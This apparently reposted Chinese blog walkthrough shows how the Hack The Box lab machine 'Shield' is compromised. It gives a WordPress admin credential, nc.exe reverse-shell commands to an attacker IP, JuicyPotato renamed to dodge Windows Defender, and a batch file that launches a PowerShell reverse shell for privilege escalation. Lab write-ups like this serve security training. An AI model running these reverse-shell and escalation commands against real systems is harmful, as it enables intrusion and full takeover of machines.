[渗透测试]HTB靶机-Shield
Posted Y4tacker
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[渗透测试]HTB靶机-Shield相关的知识,希望对你有一定的参考价值。
文章目录
Shield
扫描文件
神奇的出来个这个
扫描发现存在wordpress站点
用admin/P@s5w0rd!成功登陆后台
发现存在漏洞的
后面发现可以直接用msf来利用,完美的
换个目录方便我上传文件
接下来cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
刚刚发现文件放错地方了重新来一下
执行execute -f nc.exe -a "-e cmd.exe 10.10.14.8 1234"
成功接收到shell
接下来上传upload JuicyPotato.exe,利用MS16-075提权,网上wp说防止被windows defender拿下
mv JuicyPotato.exe js.exe
echo START C:\\inetpub\\wwwroot\\wordpress\\wp-content\\uploads\\nc.exe -e powershell.exe 10.10.14.8 1111 > shell.bat
接下来机器开启nc监听等待提权返回
js.exe -t * -p C:\\inetpub\\wwwroot\\wordpress\\wp-content\\uploads\\she.bat -l 1337
成功提权
以上是关于[渗透测试]HTB靶机-Shield的主要内容,如果未能解决你的问题,请参考以下文章